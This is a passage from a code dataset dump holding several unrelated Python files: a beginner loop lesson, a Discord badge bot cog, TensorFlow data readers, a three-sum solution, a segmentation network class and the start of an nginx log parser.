print(\"*\",end=\"\")\n\n# 需要打印10行,每行6个星星\nfor j in range(10):\n for i in range(6):\n print(\"*\", end=\"\")\n print()\n# 写代码,通常先写内循环,再写外循环\n\n\n#3. 跳出循环\n# break:终止当前循环\n# 希望在字符中检测有没有*\nfor i in \"hel*djlkgdljgklgdjdkgj\":\n if \"*\"==i:\n print(\"找到*\")\n break\n\n#输入一个数,判断是不是质数\n# 质数:只能被自己和1整除\n# 判断不是质数更容易\n# num%(2...n-1) !=0 是质数\n# num%(2...n-1) ==0 不是质数 break\nimport math\nnum=int(input(\"请输入一个数\"))\ntag=True\n# print(math.sqrt(7))\nfor i in range(2,int(math.sqrt(num))+1):\n if num%i==0:\n print(\"不是质数\")\n tag=False\n break\n # else:\n # print(\"是质数\")\n# if tag==True:\nif tag:#(简化)\n print(\"是质数\")\n\n# 因式分解\n# 8=2*4\n# 8=4*2\n# 16=2*8\n# 16=4*4\n# 16=8*2","sub_path":"python1808/day5/day5-2-for.py","file_name":"day5-2-for.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"125411197","text":"import discord\nfrom discord.ext import commands, tasks\nimport json\nimport requests\nfrom math import ceil\nfrom utils import checks\nfrom utils.badges import grant\nfrom utils.confirmation import confirm\nfrom utils.paginated_send import paginated_send_multiline, paginate_reaction\n\nBADGES_QUERY = \"\"\"\n{\n cms {\n badges {\n items {\n id\n name\n emoji\n description\n earnCriteria\n }\n }\n }\n}\n\"\"\"\n\n# noinspection PyPackageRequirements\n\n\nclass BadgeCog(commands.Cog, name=\"Badge\"):\n def __init__(self, bot):\n self.bot = bot\n self.update_badges.start()\n self.badges = []\n\n def cog_unload(self):\n self.update_badges.cancel()\n\n def gql(self, query):\n result = requests.post(\"https://graph.codeday.org/\",\n json={\"query\": query})\n data = json.loads(result.text)\n if \"errors\" in data:\n print(data[\"errors\"])\n return data[\"data\"]\n\n def get_badge(self, id):\n badges = [b for b in self.badges if (\n b['id'] == id or b['emoji'] == id)]\n if len(badges) > 0:\n return badges[0]\n return None\n\n async def send_list_badges(self, ctx, badges):\n # await paginated_send_multiline(\n # ctx,\n # \"\\n\".join([f\"{b['emoji']} **{b['name']}** (`{b['id']}`, {b['earnCriteria']}) {b['description']}\"\n # for b in badges]))\n all_badges = [f\"{b['emoji']} **{b['name']}** (`{b['id']}`, {b['earnCriteria']}) {b['description']}\"\n for b in badges]\n \n\n def generate_badge_page_embed(badgelist, index, numPages, origlist):\n return discord.Embed.from_dict({\n \"title\": \"Listing all badges\",\n \"description\": \"\\n\".join(badgelist),\n \"footer\": {\n \"icon_url\": str(ctx.author.avatar_url),\n \"text\": f\"Page {1+index}/{numPages} | {len(origlist)} results | Searched by {ctx.author.name}#{ctx.author.discriminator}\"\n }\n })\n \n perPage = 15\n pages = [{\"content\":\"\",\"embed\":generate_badge_page_embed(\n badgelist=all_badges[i:i+perPage], \n index=n,\n numPages=ceil(len(all_badges)/perPage),\n origlist=all_badges)\n } for n,i in enumerate(range(0, len(all_badges), perPage))]\n\n await paginate_reaction(pages, ctx)\n \n\n @tasks.loop(minutes=10)\n async def update_badges(self):\n print(\"updating badges\")\n self.badges = self.gql(BADGES_QUERY)[\"cms\"][\"badges\"][\"items\"]\n\n @commands.group(name=\"badge\")\n async def snippet(self, ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Invalid badge command passed...')\n\n @snippet.command(name=\"refresh\")\n @checks.requires_staff_role()\n async def refresh(self, ctx):\n self.badges = self.gql(BADGES_QUERY)[\"cms\"][\"badges\"][\"items\"]\n\n @snippet.command(name='give')\n @checks.requires_staff_role()\n async def give(self, ctx, member: discord.Member, id):\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"I haven't heard of that one.\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n if b[\"earnCriteria\"] != \"bestowed\":\n await ctx.send(\"I'm not giving those away for free!\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n return\n if await grant(self.bot, member, id):\n await ctx.message.add_reaction('\\N{THUMBS UP SIGN}')\n else:\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n\n @snippet.command(name='give_role')\n @checks.requires_staff_role()\n async def give_role(self, ctx, role: discord.Role, id):\n print(role)\n print(role.members)\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"I haven't heard of that one.\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n elif b[\"earnCriteria\"] != \"bestowed\":\n await ctx.send(\"I'm not giving those away for free!\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n elif await confirm(f'Are you sure, this will add a badge to {len(role.members)} person(s)', ctx, self.bot, ):\n await ctx.message.add_reaction('\\N{THUMBS UP SIGN}')\n for member in role.members:\n if not (await grant(self.bot, member, id)):\n await ctx.message.remove_reaction('\\N{THUMBS UP SIGN}', self.bot.user)\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n else:\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n\n @snippet.command(name='list')\n async def list(self, ctx):\n await self.send_list_badges(ctx, self.badges)\n\n @snippet.command(name='info')\n async def info(self, ctx, id):\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"Never heard of it!\")\n return\n await ctx.send(f\"{b['emoji']} **{b['name']}**: {b['description']}\")\n\n @snippet.command(name='inspect')\n async def inspect(self, ctx, member: discord.Member = None):\n\n if member is None: member = ctx.author\n\n query = f\"\"\"{{\n account {{\n getUser(where: {{ discordId: \"{member.id}\"}}, fresh: true) {{\n badges {{\n details {{\n id\n name\n emoji\n description\n earnCriteria\n }}\n }}\n }}\n }}\n }}\n \"\"\"\n result = self.gql(query)\n if not result[\"account\"][\"getUser\"]:\n await ctx.send(\"This user hasn't linked their CodeDay account.\")\n return\n\n badges = result[\"account\"][\"getUser\"][\"badges\"]\n\n await self.send_list_badges(ctx, [b['details'] for b in badges])\n\n\ndef setup(bot):\n bot.add_cog(BadgeCog(bot))\n","sub_path":"src/cogs/badge.py","file_name":"badge.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"474654110","text":" # Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\n\"\"\"Utilities for parsing PTB text files.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport os\nimport sys\nimport xmltodict\nimport numpy as np\nimport json\nimport pandas as pd\nfrom skimage import measure\nfrom pandas.io.json import json_normalize #package for flattening json in pandas df\nimport tensorflow as tf\n\nPy3 = sys.version_info[0] == 3\n\ndef read_XML(filepath, f_start, f_end, cap=40):\n with open(filepath+'XML/Video_16_3_2_GT.xml') as fd:\n doc = xmltodict.parse(fd.read())\n #print(doc['Frames']['frame'])\n #print(doc['Frames']['frame'][0])\n #print(doc['Frames']['frame'][0]['object'][0]['Point'][0]['@x'])\n #doc['Frames']['frame'][index]['@ID']\n #frame_num = len(doc['Frames']['frame'])\n frame_num = f_end- f_start+1\n target = np.zeros((frame_num, 9*cap))\n for i in range(f_start, f_end+1):\n print('%d th frame', i)\n object_num = len(doc['Frames']['frame'][i-1]['object'])\n for j in range(0, object_num):\n print(j)\n target[i - f_start, j*9] = doc['Frames']['frame'][i-1]['object'][j]['Point'][0]['@x']\n target[i - f_start, j*9+1] = doc['Frames']['frame'][i-1]['object'][j]['Point'][0]['@y']\n target[i - f_start, j*9+2] = doc['Frames']['frame'][i-1]['object'][j]['Point'][1]['@x']\n target[i - f_start, j*9+3] = doc['Frames']['frame'][i-1]['object'][j]['Point'][1]['@y']\n target[i - f_start, j*9+4] = doc['Frames']['frame'][i-1]['object'][j]['Point'][2]['@x']\n target[i - f_start, j*9+5] = doc['Frames']['frame'][i-1]['object'][j]['Point'][2]['@y']\n target[i - f_start, j*9+6] = doc['Frames']['frame'][i-1]['object'][j]['Point'][3]['@x']\n target[i - f_start, j*9+7] = doc['Frames']['frame'][i-1]['object'][j]['Point'][3]['@y']\n target[i - f_start, j*9+8] = 1.0\n return target\n\n\ndef read_json_npy(filepath, index):\n with open(filepath+'json/frame'+format(index, '03d')+'.json') as f:\n d = json.load(f)\n data = np.load(filepath+'npy/frame'+format(index, '03d')+'.npy')\n return d, data\n\n\ndef fusion_data(d, data_shrink, cap=15):\n d1 = np.ndarray.flatten(data_shrink)\n # with default 40 at most\n dim = cap*9\n output = np.zeros((len(d1)+dim),dtype=np.float32)\n for i in range(0, len(d['text_lines'])):\n output[i*9] = d['text_lines'][i]['x0']\n output[i*9+1] = d['text_lines'][i]['y0']\n output[i*9+2] = d['text_lines'][i]['x1']\n output[i*9+3] = d['text_lines'][i]['y1']\n output[i*9+4] = d['text_lines'][i]['x2']\n output[i*9+5] = d['text_lines'][i]['y2']\n output[i*9+6] = d['text_lines'][i]['x3']\n output[i*9+7] = d['text_lines'][i]['y3']\n output[i*9+8] = d['text_lines'][i]['score']\n output[dim:] = d1\n return output\n\n\ndef vect_producer(datapath, frame_start, frame_end, batch_size, num_steps, name=None):\n d, data = read_json_npy(datapath, frame_start)\n data_shrink = measure.block_reduce(np.squeeze(data), (10, 10, 1), np.mean)\n vect_encoded = fusion_data(d, data_shrink)\n l1 = len(vect_encoded)\n frame_num = frame_end - frame_start+1\n vect_set = np.zeros((frame_num, l1))\n vect_set[0, :] = vect_encoded\n for index in range(frame_start+1, frame_end+1):\n d, data = read_json_npy(datapath, index)\n data_shrink = measure.block_reduce(np.squeeze(data), (10, 10, 1), np.mean)\n vect_encoded = fusion_data(d, data_shrink)\n vect_set[index-frame_start, :] = vect_encoded\n target = read_XML(datapath, frame_start, frame_end)\n _, l2 = target.shape\n print(vect_set.shape)\n print(target.shape)\n # convert to tensor and using shuffle queue\n with tf.name_scope(name, 'VectProducer', [batch_size, num_steps]):\n input_t = tf.convert_to_tensor(vect_set, name=\"input\", dtype=tf.float32)\n target_t = tf.convert_to_tensor(target, name=\"target\", dtype=tf.float32)\n batch_len = frame_num // batch_size\n epoch_size = (batch_len - 1) // num_steps\n # parsing data from [frame_num, vect_length] to [batch_size, num_steps, vocal_size ]\n data_in = tf.reshape(input_t, [batch_size, batch_len, l1])\n data_gt = tf.reshape(target_t, [batch_size, batch_len, l2])\n # produce an iterable object for index\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data_in, [0, i * num_steps, 0], [batch_size, (i + 1) * num_steps, l1])\n x.set_shape([batch_size, num_steps, l1])\n y = tf.strided_slice(data_gt, [0, i * num_steps, 0], [batch_size, (i + 1) * num_steps, l2])\n y.set_shape([batch_size, num_steps, l2])\n return x, y\n # reshape\n\n\ndef _read_words(filename):\n with tf.gfile.GFile(filename, \"r\") as f:\n if Py3:\n return f.read().replace(\"\\n\", \"\").split()\n else:\n return f.read().decode(\"utf-8\").replace(\"\\n\", \"\").split()\n\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n return word_to_id\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n return [word_to_id[word] for word in data if word in word_to_id]\n\n\ndef ptb_raw_data(data_path=None):\n \"\"\"Load PTB raw data from data directory \"data_path\".\n\n Reads PTB text files, converts strings to integer ids,\n and performs mini-batching of the inputs.\n\n The PTB dataset comes from Tomas Mikolov's webpage:\n\n http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz\n\n Args:\n data_path: string path to the directory where simple-examples.tgz has\n been extracted.\n\n Returns:\n tuple (train_data, valid_data, test_data, vocabulary)\n where each of the data objects can be passed to PTBIterator.\n \"\"\"\n\n train_path = os.path.join(data_path, \"ptb.train.txt\")\n valid_path = os.path.join(data_path, \"ptb.valid.txt\")\n test_path = os.path.join(data_path, \"ptb.test.txt\")\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n valid_data = _file_to_word_ids(valid_path, word_to_id)\n test_data = _file_to_word_ids(test_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, valid_data, test_data, vocabulary\n\n\ndef ptb_producer(raw_data, batch_size, num_steps, name=None):\n \"\"\"Iterate on the raw PTB data.\n\n This chunks up raw_data into batches of examples and returns Tensors that\n are drawn from these batches.\n\n Args:\n raw_data: one of the raw data outputs from ptb_raw_data.\n batch_size: int, the batch size.\n num_steps: int, the number of unrolls.\n name: the name of this operation (optional).\n\n Returns:\n A pair of Tensors, each shaped [batch_size, num_steps]. The second element\n of the tuple is the same data time-shifted to the right by one.\n\n Raises:\n tf.errors.InvalidArgumentError: if batch_size or num_steps are too high.\n \"\"\"\n with tf.name_scope(name, \"PTBProducer\", [raw_data, batch_size, num_steps]):\n raw_data = tf.convert_to_tensor(raw_data, name=\"raw_data\", dtype=tf.int32)\n\n data_len = tf.size(raw_data)\n batch_len = data_len // batch_size\n data = tf.reshape(raw_data[0: batch_size * batch_len],\n [batch_size, batch_len])\n\n epoch_size = (batch_len - 1) // num_steps\n assertion = tf.assert_positive(\n epoch_size,\n message=\"epoch_size == 0, decrease batch_size or num_steps\")\n with tf.control_dependencies([assertion]):\n epoch_size = tf.identity(epoch_size, name=\"epoch_size\")\n\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data, [0, i * num_steps],\n [batch_size, (i + 1) * num_steps])\n x.set_shape([batch_size, num_steps])\n y = tf.strided_slice(data, [0, i * num_steps + 1],\n [batch_size, (i + 1) * num_steps + 1])\n y.set_shape([batch_size, num_steps])\n return x, y\n\n\n\n\n\n","sub_path":"Part II/Demo1/utils/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":9089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"263940990","text":"class Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n nums = sorted(nums)\n best = 10 ** 7\n\n def update(s):\n nonlocal best\n if abs(s - target) < abs(best - target):\n best = s\n \n nums_len = len(nums)\n for first in range(nums_len):\n if first > 0 and nums[first] == nums[first - 1]:\n continue\n second = first + 1\n third = nums_len - 1\n while second < third:\n s = nums[first] + nums[second] + nums[third]\n if s == target:\n return target\n update(s)\n if s > target:\n while second < third and nums[third] == nums[third - 1]:\n third -= 1\n third -= 1\n else:\n while second < third and nums[second] == nums[second + 1]:\n second += 1\n second += 1\n return best","sub_path":"16 最接近的三数之和/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645450575","text":"from config import FLAGS, logger\nfrom easydict import EasyDict as edict\nimport tensorflow as tf\nimport pytoolkit.tf_funcs as tfx\nimport utils\n\nclass CENet(object):\n def __init__(self, FLAGS):\n self.batch_size = bs = FLAGS.batch_size # bs: batch size in single GPU\n self.image_size = [szh,szw] = FLAGS.image_size\n self.num_gpus = nG = FLAGS.num_gpus\n self.FLAGS = FLAGS\n\n BS = bs * nG\n\n #self.ph_in_image = tf.placeholder(tf.uint8, shape=(BS, szh, szw, 3), name='ph_in_image')\n #self.ph_gt_image = tf.placeholder(tf.uint8, shape=(BS, szh, szw, 1), name='ph_gt_image')\n #self.ph_datum_wt = tf.placeholder(tf.float32, shape=(BS), name='ph_datum_wt')\n #self.ph_lr = tf.placeholder(tf.float32, shape=None, name='ph_lr')\n\n self.ph_in_image = tf.get_variable(name='ph_in_image', shape=(BS, szh, szw, 3), dtype=tf.uint8, trainable=False)\n self.ph_gt_image = tf.get_variable(name='ph_gt_image', shape=(BS, szh, szw, 1), dtype=tf.uint8, trainable=False)\n self.ph_datum_wt = tf.get_variable(name='ph_datum_wt', shape=(BS), dtype=tf.float32, trainable=False)\n self.ph_lr = tf.get_variable(name='ph_lr', shape=(), dtype=tf.float32, trainable=False)\n\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.ph_lr, beta1=0.9)\n\n self.branches = [None] * nG\n\n with tf.device('/cpu:0'):\n for gpu_id in range(nG):\n with tf.device('/gpu:%d' % gpu_id), tf.variable_scope('cpu_variables', reuse=gpu_id>0):\n logger.info('branch: %d' % gpu_id)\n start_idx = bs * gpu_id\n phs = [\n tf.slice(self.ph_in_image, [start_idx, 0, 0, 0], [bs, -1, -1, -1], name='ph_in_image_br%d' % gpu_id),\n tf.slice(self.ph_gt_image, [start_idx, 0, 0, 0], [bs, -1, -1, -1], name='ph_gt_image_br%d' % gpu_id),\n tf.slice(self.ph_datum_wt, [start_idx], [bs], name='ph_datum_wt_br%d' % gpu_id),\n ]\n self.branches[gpu_id] = CENet_Branch(FLAGS, phs, gpu_id, self.optimizer)\n\n self.out = self.merge_results(self.branches)\n self.loss = self.merge_losses(self.branches)\n self.optims = self.merge_optims(self.branches)\n self.summary, self.phs_loss_valid = self.merge_summaries(self.loss, self.var.all_vars)\n\n def merge_results(self, brs):\n return edict({k: tf.concat([b.out[k] for b in brs], 0, name=k) for k in brs[0].out.keys()})\n\n def merge_losses(self, brs):\n out = edict({})\n for k in brs[0].loss.keys():\n total_sum_loss = tf.reduce_sum([b.loss[k] * b.sum_wt for b in brs])\n total_weights = tf.reduce_sum([b.sum_wt for b in brs])\n v = tf.identity(total_sum_loss / (total_weights + 1e-8), name=k+'_loss')\n out[k] = v\n return out\n\n def merge_optims(self, brs):\n phase_grad = edict({k : tfx.average_gradients([b.phase[k] for b in brs], [b.sum_wt for b in brs])\n for k in brs[0].phase.keys()})\n return edict({k : self.optimizer.apply_gradients(v) for k, v in phase_grad.items()})\n\n def merge_summaries0(self, loss, var):\n summary_loss = edict({k + '_summary': tf.summary.scalar(k, v) for k, v in loss.items()})\n summary_weights = edict()\n for v in var:\n name = v.op.name + '_summary'\n summary_weights.update({name: tf.summary.histogram(name, v)})\n summary_loss_valid = {}\n for k, _ in loss.items():\n ph_loss_valid = tf.placeholder(tf.float32, shape=None, name='ph_' + k + '_valid')\n summary_loss_valid[k] = (ph_loss_valid, tf.summary.scalar(k + '_valid', ph_loss_valid))\n return edict({**summary_loss, **summary_weights}), edict(summary_loss_valid)\n\n def merge_summaries(self, loss, var):\n summary_loss = edict()\n phs_loss_valid = edict()\n is_valid = tf.cast(tf.less(self.ph_lr, 0), tf.float32)\n for k, v in loss.items():\n ph_loss_valid = tf.get_variable(name='ph_'+k+'_valid',\n shape=v.get_shape().as_list(), dtype=tf.float32, trainable=False)\n vx = is_valid * ph_loss_valid + (1 - is_valid) * v\n phs_loss_valid[k + '_ph_loss_valid'] = ph_loss_valid\n summary_loss[k + '_summary'] = tf.summary.scalar(k, vx)\n summary_weights = edict()\n for v in var:\n name = v.op.name + '_summary'\n summary_weights.update({name: tf.summary.histogram(name, v)})\n return edict({**summary_loss, **summary_weights}), phs_loss_valid\n\n @property\n def vgg_api(self):\n return self.branches[0].vgg_api\n\n @property\n def var(self):\n return self.branches[0].var\n\nclass CENet_Branch(object):\n def __init__(self, FLAGS, phs, gpu_id, optimizer):\n self.batch_size = FLAGS.batch_size\n self.gpu_id = gpu_id\n self.FLAGS = FLAGS\n\n self.ph_in_image = utils.to_float_tensor(phs[0])\n self.ph_gt_image = utils.to_float_tensor(phs[1])\n self.ph_datum_wt = phs[2]\n\n\n\n # G-Net\n self.rs_ou_image_train, self.layers = self.G_Net_2D(self.ph_in_image, is_train=True, reuse=False)\n self.rs_ou_image_valid, _ = self.G_Net_2D(self.ph_in_image, is_train=False, reuse=True)\n\n # Loss\n self.var = self.collect_vars()\n self.loss = self.compute_losses()\n self.phase = self.optimize(optimizer)\n\n # Out\n self.out = edict({\n 'input': utils.to_uint8_tensor(self.ph_in_image),\n 'rs_ou_image_valid': utils.to_uint8_tensor(self.rs_ou_image_valid),\n 'gt': utils.to_uint8_tensor(self.ph_gt_image),\n 'rs_ou_image_train': utils.to_uint8_tensor(self.rs_ou_image_train),\n })\n\n def G_Net_2D_v0(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 1]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n return tf.nn.tanh(layers[-1]), layers\n\n def G_Net_2D(self, im, is_train, reuse):\n if self.FLAGS.version == 'v1':\n return self.G_Net_2D_v1(im, is_train, reuse)\n elif self.FLAGS.version == 'v2':\n return self.G_Net_2D_v2(im, is_train, reuse)\n elif self.FLAGS.version == 'v3':\n return self.G_Net_2D_v3(im, is_train, reuse)\n elif self.FLAGS.version == 'v4':\n return self.G_Net_2D_v4(im, is_train, reuse)\n\n def G_Net_2D_v1(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 1]\n #chns = [x // 8 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n return tf.nn.tanh(layers[-1]), layers\n\n def G_Net_2D_v2(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 2]\n #chns = [x // 8 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def G_Net_2D_v4(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 2]\n chns = [x // 2 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def G_Net_2D_v3(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 2]\n chns = [x // 4 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n\n layers += [tf.slice(tf.nn.softmax(layers[-1]) * 2.0 - 1.0, [0, 0, 0, 1], [-1, -1, -1, 1], name='segmented')]\n return layers[-1], layers\n\n def collect_vars(self):\n all_vars = [var for var in tf.all_variables() if 'VGG' not in var.name]\n t_vars = [var for var in tf.trainable_variables() if 'VGG' not in var.name]\n vgg_vars = [var for var in tf.trainable_variables() if 'VGG' in var.name]\n\n g_vars_im = [var for var in t_vars if 'generator_im' in var.name]\n d_vars_im = [var for var in t_vars if 'discriminator_im' in var.name]\n\n assert len(g_vars_im) + len(d_vars_im) == len(t_vars), 'vars number inconsistent! (1)'\n assert len(t_vars) + len(vgg_vars) == len(tf.trainable_variables()), 'vars number inconsistent! (2)'\n\n var = edict({\n 'all_vars': all_vars,\n 't_vars': t_vars,\n 'g_im_vars': g_vars_im,\n 'd_im_vars': d_vars_im,\n 'vgg_vars': vgg_vars\n })\n return var\n\n def compute_losses(self):\n self.sum_wt = tf.reduce_sum(self.ph_datum_wt)\n\n l1_im, l1_im_datum = utils.compute_lxloss(self.ph_datum_wt,\n self.rs_ou_image_train,\n self.ph_gt_image, name='l1loss_im', mode='l1')\n\n ce_im, ce_im_datum = utils.compute_celoss(self.ph_datum_wt,\n self.layers[-2],\n self.ph_gt_image, name='celoss_im')\n\n P_R_IoU_FPR_F1_im, _ = utils.compute_IoU(self.ph_datum_wt,\n self.rs_ou_image_valid,\n self.ph_gt_image, 0, name='seg_eval_im')\n\n wtd_ce_im, wt_im_datum = utils.compute_weighted_celoss(self.ph_datum_wt,\n self.layers[-2],\n self.ph_gt_image,\n self.FLAGS.weight_ce, name='weighted_celoss_im')\n\n weight_decay = self.FLAGS.weight_decay * utils.compute_weight_decay(self.var['g_im_vars'])\n\n loss = edict({\n 'l1loss_im': l1_im,\n 'celoss_im': ce_im + weight_decay,\n 'wtdecay_loss_im': weight_decay,\n 'wtd_celoss_im': wtd_ce_im + weight_decay,\n 'precision': P_R_IoU_FPR_F1_im[0],\n 'recall': P_R_IoU_FPR_F1_im[1],\n 'IoU': P_R_IoU_FPR_F1_im[2],\n 'F1Score': P_R_IoU_FPR_F1_im[4]\n })\n return loss\n\n def optimize(self, optimizer):\n phases = edict({\n 'l1loss_im': 'g_im_vars',\n 'celoss_im': 'g_im_vars',\n 'wtd_celoss_im': 'g_im_vars',\n 'g_loss_im': 'g_im_vars',\n 'd_loss_im': 'd_im_vars',\n })\n phase_opts = edict({})\n logger.info('{:-^72}'.format('Experiment: {:2d} Phases'.format(len(phases))))\n for idx, (phase_name, vname) in enumerate(phases.items()):\n if phase_name in self.loss and vname in self.var:\n phase_opts[phase_name] = optimizer.compute_gradients(self.loss[phase_name], var_list=self.var[vname])\n logger.info('{:d}) {}'.format(idx, phase_name))\n else:\n logger.warning('{:d}) WARNING! LOSS: {:>10s} or VARS: {:>10s} NOT EXIST!'.format(idx, phase_name, vname))\n logger.info('-' * 72)\n return phase_opts","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":16049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"3257623","text":"#\n# parse a tipical nginx error log like this\n#\n# 2012/11/29 19:30:02\n# [error] 15596#0: *4 open() \"/srv/active/collected-static/50x.html\" failed (2: No such file or directory),\n# client: 65.44.217.34,\n# server: ,\n# request: \"GET /api/megapage/poll/?cursor=1354216956 HTTP/1.1\",\n# upstream: \"http://0.0.0.0:9000/api/megapage/poll/?cursor=1354216956\",\n# host: \"165.225.132.103\",\n# referrer: \"http://165.225.132.103/megapage/\"\n\n\nfrom string import strip\n\ndef nginx_error_parser(line):\n csv_list = 